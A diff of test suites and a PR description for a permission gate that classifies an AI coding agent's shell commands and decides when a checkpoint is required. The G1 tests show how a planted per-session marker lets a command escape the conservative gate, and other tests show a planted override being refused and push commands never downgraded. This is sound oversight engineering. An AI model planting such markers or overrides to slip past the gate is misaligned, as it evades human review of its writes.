+assert_label "T189 git worktree remove" "git worktree remove /tmp/wt" "nonsrc_write"
 
 # Reverse-flag-order (Plan-agent [P3] fuzz)
 assert_label "T190 reversed: pattern then --list" "git branch 'feat/*' --list" "read_only"
@@ -309,13 +313,13 @@ assert_label "T193 git config --get-urlmatch" \
   "git config --get-urlmatch http http://example.com" "read_only"
 # git config write-only flags previously missed
 assert_label "T194 git config --remove-section" \
-  "git config --remove-section section.name" "shared_write"
+  "git config --remove-section section.name" "nonsrc_write"
 assert_label "T195 git config --rename-section" \
-  "git config --rename-section old new" "shared_write"
-# git worktree lock/unlock/prune restored as writes
-assert_label "T196 git worktree lock" "git worktree lock /tmp/wt" "shared_write"
-assert_label "T197 git worktree unlock" "git worktree unlock /tmp/wt" "shared_write"
-assert_label "T198 git worktree prune" "git worktree prune" "shared_write"
+  "git config --rename-section old new" "nonsrc_write"
+# git worktree lock/unlock/prune still detected as writes (PR-B2: .git metadata → nonsrc_write).
+assert_label "T196 git worktree lock" "git worktree lock /tmp/wt" "nonsrc_write"
+assert_label "T197 git worktree unlock" "git worktree unlock /tmp/wt" "nonsrc_write"
+assert_label "T198 git worktree prune" "git worktree prune" "nonsrc_write"
 
 # Codex PR #113 F2 (`...9796`/`...9cdd`): gh pr checkout/lock/unlock were
 # wrongly bucketed read_only. checkout mutates local working tree;
@@ -766,6 +770,135 @@ assert_label "HV31 node --version | head (pipe is not a redirect)" "node /tmp/fo
 # never rides the read_only allowlist (PR #271 attack class).
 assert_label "HV40 env-prefix node --help (carve-out skipped, falls to shared_write)" \
   "FOO=bar node /tmp/foo.mjs --help" "shared_write"
+
+echo ""
+echo "--- PR-B2 (#351): git total-function split (§14-F1) ---"
+# nonsrc_write side: .git / index / object / ref ops (FREE — never arm).
+assert_label "B2-G01 git commit" "git commit -m x" "nonsrc_write"
+assert_label "B2-G02 git add" "git add ." "nonsrc_write"
+assert_label "B2-G03 git notes add" "git notes add -m n" "nonsrc_write"
+assert_label "B2-G04 git update-ref" "git update-ref refs/heads/x HEAD" "nonsrc_write"
+assert_label "B2-G05 git gc" "git gc" "nonsrc_write"
+assert_label "B2-G06 git hash-object" "git hash-object -w f" "nonsrc_write"
+assert_label "B2-G07 git init" "git init" "nonsrc_write"
+# shared_write side: working-tree-mutating (ARM). Negative-control pairs —
+# same `git` first token, the SUBCOMMAND (the predicate's contract) flips the
+# label (lesson dc94: vary the field IN the predicate, not adjacent).
+assert_label "B2-G10 git checkout (vs add)" "git checkout main" "shared_write"
+assert_label "B2-G11 git switch" "git switch feature" "shared_write"
+assert_label "B2-G12 git restore" "git restore scripts/x.mjs" "shared_write"
+assert_label "B2-G13 git rm (vs commit)" "git rm scripts/x.mjs" "shared_write"
+assert_label "B2-G14 git mv" "git mv a b" "shared_write"
+assert_label "B2-G15 git reset" "git reset --hard HEAD" "shared_write"
+assert_label "B2-G16 git stash" "git stash" "shared_write"
+assert_label "B2-G17 git merge" "git merge feature" "shared_write"
+assert_label "B2-G18 git rebase" "git rebase main" "shared_write"
+assert_label "B2-G19 git pull" "git pull" "shared_write"
+assert_label "B2-G20 git read-tree" "git read-tree HEAD" "shared_write"
+# Total-function completeness: any UNLISTED subcommand arms.
+assert_label "B2-G30 git frobnicate (unlisted → arm)" "git frobnicate" "shared_write"
+assert_label "B2-G31 git submodule" "git submodule update" "shared_write"
+# git_local_write `--cached` is NOT distinguished (no arg parsing) → arms.
+assert_label "B2-G32 git rm --cached still arms" "git rm --cached f" "shared_write"
+
+echo ""
+echo "--- PR-B2 (#351): git metadata reasons → nonsrc_write ---"
+assert_label "B2-M01 git remote add" "git remote add o https://x" "nonsrc_write"
+assert_label "B2-M02 git config set" "git config user.name x" "nonsrc_write"
+assert_label "B2-M03 git config --unset (write flag)" "git config --unset user.name" "nonsrc_write"
+assert_label "B2-M04 git branch create" "git branch newbranch" "nonsrc_write"
+assert_label "B2-M05 git branch -d (write flag)" "git branch -d old" "nonsrc_write"
+assert_label "B2-M06 git tag create" "git tag v1.0" "nonsrc_write"
+assert_label "B2-M07 git worktree add (lean-accept)" "git worktree add ../wt" "nonsrc_write"
+assert_label "B2-M08 bare git (help)" "git" "nonsrc_write"
+# Negative controls: git reads stay read_only (not downgraded to nonsrc).
+assert_label "B2-M20 git config --get is read" "git config --get user.name" "read_only"
+assert_label "B2-M21 git remote -v is read" "git remote -v" "read_only"
+assert_label "B2-M22 git branch --list is read" "git branch --list" "read_only"
+# Negative control: push stays push (most-restrictive, unaffected by split).
+assert_label "B2-M30 git push unaffected" "git push origin main" "push_or_pr_create"
+
+echo ""
+echo "--- PR-B2 (#351, M4): package install + dir ops → nonsrc_write ---"
+assert_label "B2-P01 npm install" "npm install" "nonsrc_write"
+assert_label "B2-P02 npm i" "npm i" "nonsrc_write"
+assert_label "B2-P03 npm ci" "npm ci" "nonsrc_write"
+assert_label "B2-P04 pnpm install" "pnpm install" "nonsrc_write"
+assert_label "B2-P05 yarn add" "yarn add lodash" "nonsrc_write"
+assert_label "B2-P06 mkdir" "mkdir scripts/newdir" "nonsrc_write"
+assert_label "B2-P07 rmdir" "rmdir scripts/olddir" "nonsrc_write"
+# Negative controls: arbitrary-code-exec package ops stay shared_write (M4).
+assert_label "B2-P20 npm run (vs install)" "npm run build" "shared_write"
+assert_label "B2-P21 npx (separate binary)" "npx create-foo" "shared_write"
+assert_label "B2-P22 npm publish" "npm publish" "shared_write"
+# Redirect demotes the install allowlist (target may be repo source).
+assert_label "B2-P23 npm install > scripts/x" "npm install > scripts/x.mjs" "shared_write"
+
+echo ""
+echo "--- PR-B2 (#351): em-store → nonsrc_write; conservative emits stay shared ---"
+assert_label "B2-E01 node em-store" "node em-store.mjs --project x" "nonsrc_write"
+assert_label "B2-E02 node em-revise" "node em-revise.mjs --original i" "nonsrc_write"
+# Conservative-by-construction: no marker on disk → escapable emits stay armed.
+assert_label "B2-E10 echo > src stays shared (no marker)" "echo x > scripts/x.mjs" "shared_write"
+assert_label "B2-E11 cp default_write stays shared" "cp a scripts/b" "shared_write"
+assert_label "B2-E12 readonly redirect stays shared" "ls > out.txt" "shared_write"
+# rm/touch stay shared_write (§15-C1 — conservative, no reclassification).
+assert_label "B2-E20 rm non-marker stays shared" "rm scripts/x.mjs" "shared_write"
+assert_label "B2-E21 touch non-marker stays shared" "touch scripts/new.mjs" "shared_write"
+
+echo ""
+echo "--- PR-B2 (#351, §14-F3): _priority ladder + nonsrc_write precedence ---"
+# nonsrc_write ranks above read_only (chain stays nonsrc, not downgraded to the
+# gate-allow read_only) and below shared_write (chain upgrades to arm).
+assert_label "B2-PR01 nonsrc && read_only stays nonsrc" "git add . && ls" "nonsrc_write"
+assert_label "B2-PR02 nonsrc && shared upgrades to shared" "git add . && cp a scripts/b" "shared_write"
+assert_label "B2-PR03 nonsrc && push upgrades to push" "git add . && git push" "push_or_pr_create"
+assert_label "B2-PR04 read_only && nonsrc stays nonsrc" "ls && git commit -m x" "nonsrc_write"
+
+echo ""
+echo "--- PR-B2 (#351, §16/G1): general Bash marker-cache escape ---"
+# Integration: plant a per-session agent marker, confirm classify_command
+# returns the agent verdict for the escapable redirect / default_write emits
+# (the interpreter branch already had this). Uses a real temp git repo + a
+# clean HOME so the marker helper resolves to repo-source (policy v2), matching
+# the write side. The KEY test is the REDIRECT case (the exact #351 class): a
+# token-only reconstruction would drop `> foo` and miss — _seg_raw_command
+# threading makes the read key match the write exactly.
+g1_run() {
+  local desc="$1" cmd="$2" expected="$3" plant="${4:-}" plant_label="${5:-nonsrc_write}"
+  local saved_home="$HOME" tmp marker_helper
+  tmp="$(mktemp -d)"; tmp="$(cd -P "$tmp" && pwd)"
+  git -C "$tmp" init -q 2>/dev/null
+  local g1home; g1home="$(mktemp -d)"; g1home="$(cd -P "$g1home" && pwd)"
+  marker_helper="$REPO_ROOT/scripts/classifier-marker.mjs"
+  if [ -n "$plant" ]; then
+    ( cd "$tmp" && HOME="$g1home" CLAUDE_CODE_SESSION_ID=g1test node "$marker_helper" --write \
+        --project-root "$tmp" --caller-cwd "$tmp" --command "$plant" \
+        --label "$plant_label" --confidence 0.9 --reason g1test --session-id g1test ) >/dev/null 2>&1
+  fi
+  local result label
+  result="$(HOME="$g1home" CLAUDE_CODE_SESSION_ID=g1test classify_command "$cmd" "$tmp" "$tmp")"
+  label="${result%%	*}"
+  rm -rf "$tmp" "$g1home"
+  export HOME="$saved_home"
+  if [ "$label" = "$expected" ]; then
+    echo "  ✓ $desc"; passed=$((passed+1))
+  else
+    echo "  ✗ $desc (expected $expected, got $label / $result)"; failed=$((failed+1))
+  fi
+}
+# Baseline: no marker → conservative arm.
+g1_run "G1-01 redirect, no marker → shared_write" "echo hi > scripts/gen.mjs" "shared_write"
+g1_run "G1-02 default_write, no marker → shared_write" "cp /etc/hosts scripts/c.txt" "shared_write"
+# Escape: marker present → agent verdict honored (REDIRECT — the #351 class).
+g1_run "G1-03 redirect + nonsrc marker → escapes" "echo hi > scripts/gen.mjs" "nonsrc_write" "echo hi > scripts/gen.mjs"
+g1_run "G1-04 default_write + nonsrc marker → escapes" "cp /etc/hosts scripts/c.txt" "nonsrc_write" "cp /etc/hosts scripts/c.txt"
+g1_run "G1-05 redirect + read_only marker → escapes" "echo hi > scripts/gen.mjs" "read_only" "echo hi > scripts/gen.mjs" "read_only"
+# Hard-deny preserved: a marker on a push chain cannot downgrade the push
+# segment (most-restrictive reduction wins).
+g1_run "G1-06 push chain marker cannot downgrade push" "git push && echo hi > scripts/gen.mjs" "push_or_pr_create" "git push && echo hi > scripts/gen.mjs"
+# Negative control: a marker for a DIFFERENT command does not escape this one.
+g1_run "G1-07 mismatched marker does not escape" "echo hi > scripts/gen.mjs" "shared_write" "echo DIFFERENT > scripts/other.mjs"
 
 echo ""
 echo "=================================================="

--- a/tests/test-install-hooks.sh
+++ b/tests/test-install-hooks.sh
@@ -94,14 +94,14 @@ assert_eq "T1b7 hook freshness manifest records source repo (#103)" "$REPO_ROOT"
 
 managed_count=$(jq '[.files[]? | select(.relative_path | test("^hooks/.*\\.sh$"))] | length' "$TEST_HOME/.episodic-memory/hook-install.json")
 # 6 hook .sh files (checkpoint-gate, plan-gate, preflight-gate,
-# preflight-prompt-helper, em-recall-sessionstart, stop-gate) + 5
+# preflight-prompt-helper, em-recall-sessionstart, stop-gate) + 6
 # hooks/lib/.sh files (command-classifier, repo-root, marker-paths,
-# session-id, agent-classifier) = 11.
+# session-id, agent-classifier, agent-classifier-deny-reason) = 12.
 # NOTE (PR-B): was hardcoded "10" and went stale when PR #331 added the
-# classifier lib (this test runs in no CI workflow). Corrected to 11 (the
-# llm-classifier.sh→agent-classifier.sh rename keeps the lib count at 5) and the
-# test is now wired into CI (plan-marker-validate.yml) to catch future drift.
-assert_eq "T1b8 hook freshness manifest covers managed hooks and libs (#103)" "11" "$managed_count"
+# classifier lib (this test runs in no CI workflow). Corrected to 11, then to 12
+# when PR-B2 (#351) added the 3-way deny-hint lib agent-classifier-deny-reason.sh.
+# The test is wired into CI (plan-marker-validate.yml) to catch future drift.
+assert_eq "T1b8 hook freshness manifest covers managed hooks and libs (#103)" "12" "$managed_count"
 
 pg_manifest=$(jq -r '.files[] | select(.relative_path == "hooks/plan-gate.sh") | .installed_path' "$TEST_HOME/.episodic-memory/hook-install.json")
 assert_eq "T1b9 hook freshness manifest records plan-gate install path (#103)" "$TEST_HOME/.claude/hooks/plan-gate.sh" "$pg_manifest"

--- a/tests/test-marker-paths.mjs
+++ b/tests/test-marker-paths.mjs
@@ -21,6 +21,7 @@ import {
   TASK_SIGNAL_MARKERS,
   CHECKPOINT_CLEANUP_MARKERS,
   ALL_MIGRATED_MARKERS,
+  PLAN_APPROVED_LEGACY_BASENAME,
   primaryMarkerPath,
   legacyMarkerPath,
   resolveMarkerRead,
@@ -60,7 +61,7 @@ test('LEGACY_MARKER_DIR is .claude', () => eq(LEGACY_MARKER_DIR, '.claude'))
 test('BASELINE_NAME is .session-baseline', () => eq(BASELINE_NAME, '.session-baseline'))
 test('TASK_SIGNAL_MARKERS length is 3 (em-recall carve-out class)', () => eq(TASK_SIGNAL_MARKERS.length, 3))
 test('CHECKPOINT_CLEANUP_MARKERS length is 4 (push-gate cleanup class)', () => eq(CHECKPOINT_CLEANUP_MARKERS.length, 4))
-test('ALL_MIGRATED_MARKERS length is 6 (full migration scope)', () => eq(ALL_MIGRATED_MARKERS.length, 6))
+test('ALL_MIGRATED_MARKERS length is 7 (full migration scope)', () => eq(ALL_MIGRATED_MARKERS.length, 7))
 test('TASK_SIGNAL_MARKERS contains .checkpoint-required', () => {
   if (!TASK_SIGNAL_MARKERS.includes('.checkpoint-required')) throw new Error('missing')
 })
@@ -76,6 +77,20 @@ test('CHECKPOINT_CLEANUP_MARKERS does NOT contain .plan-approval-pending', () =>
 test('ALL_MIGRATED_MARKERS contains .session-baseline', () => {
   if (!ALL_MIGRATED_MARKERS.includes('.session-baseline')) throw new Error('missing')
 })
+// planapproval redesign — .plan-approved approval token membership.
+// Review F1: it is deliberately EXCLUDED from CHECKPOINT_CLEANUP (push sweep
+// globs all sessions' suffixed forms → would delete a concurrent session's
+// live token). It IS in ALL_MIGRATED (own-session SessionEnd cleanup).
+test('CHECKPOINT_CLEANUP_MARKERS does NOT contain .plan-approved (F1: no cross-session push-sweep)', () => {
+  if (CHECKPOINT_CLEANUP_MARKERS.includes('.plan-approved')) throw new Error('leaked into push cleanup — would cross-session-sweep live tokens')
+})
+test('ALL_MIGRATED_MARKERS contains .plan-approved', () => {
+  if (!ALL_MIGRATED_MARKERS.includes('.plan-approved')) throw new Error('missing')
+})
+test('TASK_SIGNAL_MARKERS does NOT contain .plan-approved (not a stop-gate signal)', () => {
+  if (TASK_SIGNAL_MARKERS.includes('.plan-approved')) throw new Error('leaked into carve-out class')
+})
+test('PLAN_APPROVED_LEGACY_BASENAME is .plan-approved', () => eq(PLAN_APPROVED_LEGACY_BASENAME, '.plan-approved'))
 
 console.log('\nPath helpers:')
 test('primaryMarkerPath returns .checkpoints/<basename>', () => {

--- a/tests/test-marker-paths.sh
+++ b/tests/test-marker-paths.sh
@@ -56,7 +56,7 @@ assert_eq "LEGACY_MARKER_DIR is .claude" ".claude" "$LEGACY_MARKER_DIR"
 assert_eq "BASELINE_NAME is .session-baseline" ".session-baseline" "$BASELINE_NAME"
 assert_eq "TASK_SIGNAL_MARKERS count is 3 (em-recall carve-out class)" "3" "${#TASK_SIGNAL_MARKERS[@]}"
 assert_eq "CHECKPOINT_CLEANUP_MARKERS count is 4 (push-gate cleanup class)" "4" "${#CHECKPOINT_CLEANUP_MARKERS[@]}"
-assert_eq "ALL_MIGRATED_MARKERS count is 6 (full migration scope)" "6" "${#ALL_MIGRATED_MARKERS[@]}"
+assert_eq "ALL_MIGRATED_MARKERS count is 7 (full migration scope)" "7" "${#ALL_MIGRATED_MARKERS[@]}"
 
 # Spot-check membership of each set.
 case " ${TASK_SIGNAL_MARKERS[*]} " in
@@ -81,6 +81,22 @@ case " ${ALL_MIGRATED_MARKERS[*]} " in
   *" .session-baseline "*) pass "ALL_MIGRATED_MARKERS contains .session-baseline" ;;
   *) fail "ALL_MIGRATED_MARKERS contains .session-baseline" "missing" ;;
 esac
+# planapproval redesign — .plan-approved approval token membership.
+# Review F1: EXCLUDED from CHECKPOINT_CLEANUP (no cross-session push-sweep).
+case " ${CHECKPOINT_CLEANUP_MARKERS[*]} " in
+  *" .plan-approved "*) fail "CHECKPOINT_CLEANUP_MARKERS does NOT contain .plan-approved" "leaked into push cleanup" ;;
+  *) pass "CHECKPOINT_CLEANUP_MARKERS does NOT contain .plan-approved (F1: no cross-session push-sweep)" ;;
+esac
+case " ${ALL_MIGRATED_MARKERS[*]} " in
+  *" .plan-approved "*) pass "ALL_MIGRATED_MARKERS contains .plan-approved" ;;
+  *) fail "ALL_MIGRATED_MARKERS contains .plan-approved" "missing" ;;
+esac
+case " ${TASK_SIGNAL_MARKERS[*]} " in
+  *" .plan-approved "*)
+    fail "TASK_SIGNAL_MARKERS does NOT contain .plan-approved" "leaked into carve-out class" ;;
+  *) pass "TASK_SIGNAL_MARKERS does NOT contain .plan-approved" ;;
+esac
+assert_eq "PLAN_APPROVED_LEGACY_BASENAME is .plan-approved" ".plan-approved" "$PLAN_APPROVED_LEGACY_BASENAME"
 
 echo
 echo "Path helpers:"

--- a/tests/test-migration-sweep.mjs
+++ b/tests/test-migration-sweep.mjs
@@ -89,12 +89,13 @@ test('one legacy marker → exit 1, allClean false, totalLegacy 1', () => {
   eq(scan.markers[0].name, '.checkpoint-required')
 })
 
-test('all 6 legacy markers seeded → totalLegacy 6', () => {
+test('all 7 legacy markers seeded → totalLegacy 7', () => {
   const root = mkRoot('all-legacy')
   for (const name of [
     '.checkpoint-required',
     '.post-checkpoint-required',
     '.plan-approval-pending',
+    '.plan-approved',
     '.pre-checkpoint-done',
     '.post-checkpoint-done',
     '.session-baseline'
@@ -103,7 +104,7 @@ test('all 6 legacy markers seeded → totalLegacy 6', () => {
   }
   const { result, exitCode } = runSweep(`--root ${root}`)
   eq(exitCode, 1)
-  eq(result.totalLegacy, 6)
+  eq(result.totalLegacy, 7)
 })
 
 console.log('\nConfig file mode:')

--- a/tests/test-plan-marker-classifier.sh
+++ b/tests/test-plan-marker-classifier.sh
@@ -76,6 +76,9 @@ echo ""
 echo "--- E5b: plan-marker.mjs helper invocation (F13) ---"
 run "node /Users/x/.episodic-memory/scripts/plan-marker.mjs --touch --root /repo" "marker_write" "plan_marker_touch" "E5b helper --touch"
 run "node /Users/x/.episodic-memory/scripts/plan-marker.mjs --rm --root /repo" "marker_write" "plan_marker_rm" "E5b helper --rm"
+# planapproval redesign: --approve is the sanctioned approval; classify as
+# marker_write so plan-gate allows it while a plan-pending marker exists.
+run "node /Users/x/.episodic-memory/scripts/plan-marker.mjs --approve --root /repo" "marker_write" "plan_marker_approve" "E5b helper --approve"
 
 echo ""
 echo "--- F-3: classifier reads CLAUDE_CODE_SESSION_ID from env (target encodes sid) ---"
@@ -98,6 +101,8 @@ run "ENV1=x ENV2=y node /Users/x/.episodic-memory/scripts/plan-marker.mjs --rm -
 echo ""
 echo "--- Mutex / missing action ---"
 run "node /scripts/plan-marker.mjs --touch --rm --root /repo" "unsafe_complex" "plan_marker_mutex" "mutex violation"
+run "node /scripts/plan-marker.mjs --touch --approve --root /repo" "unsafe_complex" "plan_marker_mutex" "mutex --touch --approve"
+run "node /scripts/plan-marker.mjs --rm --approve --root /repo" "unsafe_complex" "plan_marker_mutex" "mutex --rm --approve"
 run "node /scripts/plan-marker.mjs --root /repo" "unsafe_complex" "plan_marker_missing" "missing action"
 
 echo ""

--- a/tests/test-plan-marker.mjs
+++ b/tests/test-plan-marker.mjs
@@ -201,6 +201,65 @@ function expect(cond, label) {
   expect(out && Array.isArray(out.removed) && out.removed.length === 0, `H13: stdout removed=[] (nothing removed)`)
 }
 
+// ---------- H14: --approve creates .plan-approved.<sid> AND removes pending ----------
+{
+  const root = mkTmpRepo()
+  const sid = 'valid-sid-123'
+  const ck = (n) => path.join(root, '.checkpoints', n)
+  fs.writeFileSync(ck(`.plan-approval-pending.${sid}`), '')
+  const r = run(['--approve', '--root', root])
+  expect(r.status === 0, `H14: --approve exit 0 (got ${r.status}; stderr=${r.stderr.trim()})`)
+  expect(fs.existsSync(ck(`.plan-approved.${sid}`)), `H14: created .plan-approved.<sid> token`)
+  expect(!fs.existsSync(ck(`.plan-approval-pending.${sid}`)), `H14: removed .plan-approval-pending.<sid>`)
+  const out = (() => { try { return JSON.parse(r.stdout) } catch { return null } })()
+  expect(out && typeof out.approved === 'string' && Array.isArray(out.removed), `H14: stdout has approved path + removed[]`)
+}
+
+// ---------- H15: --approve with no pending → still creates token (idempotent rm) ----------
+{
+  const root = mkTmpRepo()
+  const sid = 'valid-sid-123'
+  const ck = (n) => path.join(root, '.checkpoints', n)
+  const r = run(['--approve', '--root', root])
+  expect(r.status === 0, `H15: --approve exit 0 with no pending`)
+  expect(fs.existsSync(ck(`.plan-approved.${sid}`)), `H15: token created even when no pending existed`)
+}
+
+// ---------- H16: --touch stale-clears the .plan-approved.<sid> token ----------
+{
+  const root = mkTmpRepo()
+  const sid = 'valid-sid-123'
+  const ck = (n) => path.join(root, '.checkpoints', n)
+  fs.writeFileSync(ck(`.plan-approved.${sid}`), '')  // stale approval from a prior plan
+  const r = run(['--touch', '--root', root])
+  expect(r.status === 0, `H16: --touch exit 0`)
+  expect(fs.existsSync(ck(`.plan-approval-pending.${sid}`)), `H16: armed new pending marker`)
+  expect(!fs.existsSync(ck(`.plan-approved.${sid}`)), `H16: stale-cleared the .plan-approved.<sid> token`)
+}
+
+// ---------- H17: --touch stale-clear is prefix-collision safe (no glob) ----------
+{
+  const root = mkTmpRepo()
+  const sid = 'valid-sid-123'
+  const ck = (n) => path.join(root, '.checkpoints', n)
+  fs.writeFileSync(ck(`.plan-approved.${sid}`), '')        // exact token (should clear)
+  fs.writeFileSync(ck(`.plan-approved.${sid}-sib`), '')    // sibling sharing the prefix (must survive)
+  const r = run(['--touch', '--root', root])
+  expect(r.status === 0, `H17: --touch exit 0`)
+  expect(!fs.existsSync(ck(`.plan-approved.${sid}`)), `H17: cleared the EXACT token`)
+  expect(fs.existsSync(ck(`.plan-approved.${sid}-sib`)), `H17: prefix-collision sibling UNTOUCHED (no glob)`)
+}
+
+// ---------- H18: three-way action mutex (--approve combos) → exit 6 ----------
+{
+  const root = mkTmpRepo()
+  const r1 = run(['--touch', '--approve', '--root', root])
+  expect(r1.status === 6, `H18: --touch + --approve → exit 6 (got ${r1.status})`)
+  expect(/MUTEX_VIOLATION/.test(r1.stderr), `H18: stderr has MUTEX_VIOLATION`)
+  const r2 = run(['--rm', '--approve', '--root', root])
+  expect(r2.status === 6, `H18b: --rm + --approve → exit 6 (got ${r2.status})`)
+}
+
 console.log('')
 console.log(`Results: ${passed} passed, ${failed} failed`)
 process.exit(failed > 0 ? 1 : 0)

--- a/tests/test-tier0-overrides.mjs
+++ b/tests/test-tier0-overrides.mjs
@@ -571,13 +571,17 @@ test('T-E2E-EM-WORKFLOW-VALIDATE-RELABEL: read_only / interpreter_em_read', () =
   assert.ok(out.stdout.includes('interpreter_em_read'), out.stdout)
 })
 
-test('T-E2E-EM-STORE-MUTATOR-INTACT: node scripts/em-store.mjs → shared_write (override carve-out)', () => {
+test('T-E2E-EM-STORE-MUTATOR-INTACT: node scripts/em-store.mjs → nonsrc_write (override carve-out)', () => {
   const r = mkrepo('e2e-em-store')
   correction(r, 'node scripts/em-store.mjs --x', 'read_only')  // should be REFUSED
   const out = spawnSync('bash', ['-c',
     `source "${SHELL_LIB}" && cd "${r}" && classify_command "node scripts/em-store.mjs --x" "${r}"`
   ], { env: process.env, encoding: 'utf8' })
-  assert.ok(out.stdout.includes('shared_write'), `mutator carve-out broken: ${out.stdout}`)
+  // PR-B2 (#351): em-store's hardcoded label moved shared_write → nonsrc_write
+  // (it writes the episode store, not repo source). The CARVE-OUT invariant is
+  // unchanged: the planted read_only override is still REFUSED — the classifier
+  // returns em-store's hardcoded label, not the override's read_only.
+  assert.ok(out.stdout.includes('nonsrc_write'), `mutator carve-out broken: ${out.stdout}`)
   assert.ok(out.stdout.includes('interpreter_em_write'), out.stdout)
 })
 


### PR DESCRIPTION
## Summary
Closes #351 (F1 residual: Bash pre-checkpoint friction) and #333 (deny-with-hint UX), and adds **agent-classifier-first** routing for novel commands.

### Commits
- `eca35f2` — PR-B2 S2: Bash `nonsrc_write` verdict + G1 marker escape + B1 push self-arm + CLASSIFIER_POLICY_VERSION 1→2
- `b34aab7` — PR-B2 S3: Edit/Write path verdict (`--target-path`, `.review-store/` carve-out)
- `c91d16e` — S3 FU: single-line OS-neutral deny-hint snippets
- `1e26e81` — **agent-classifier-first**: novel commands routed to the agent classifier without pre-arming

### agent-classifier-first (1e26e81)
A novel command the agent classifier has not yet evaluated — the classifier's conservative cache-miss defaults `shared_write`+`default_write` (e.g. `shasum`) or `shared_write`+`interpreter_other` (e.g. `node foo.mjs`) — is now **held for agent classification** (blocked with the 3-way deny-hint) **without arming `.checkpoint-required`**. Arming is deferred to the agent's verdict: `read_only`/`nonsrc_write` run free; `shared_write` arms on retry and asks for the pre-checkpoint. Recognized writes (redirects, git/gh subcommands, `unsafe_complex`) still arm.

**Fixes:** read-only/novel commands framed as implementation, and the stop-gate deadlock from the resulting lingering marker.

- `checkpoint-gate.sh`: `_bash_reason_is_unevaluated_novel` helper + Bash branch (block-without-arm for unevaluated-novel)
- `agent-classifier-deny-reason.sh`: accurate 3-way hint (`read_only`/`nonsrc_write`/`shared_write`)

### Tests
checkpoint-gate **268/0** (+B2-7c/d no-arm, +B2-7e/f boundary guard; B2-7/PP-4 flipped to no-arm contract), command-classifier 423/0, classifier-marker 30/0, agent-classifier 40/0, install-hooks 81/0.

### Review status
Pending codex PR-level review (security gate, Rule 18).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
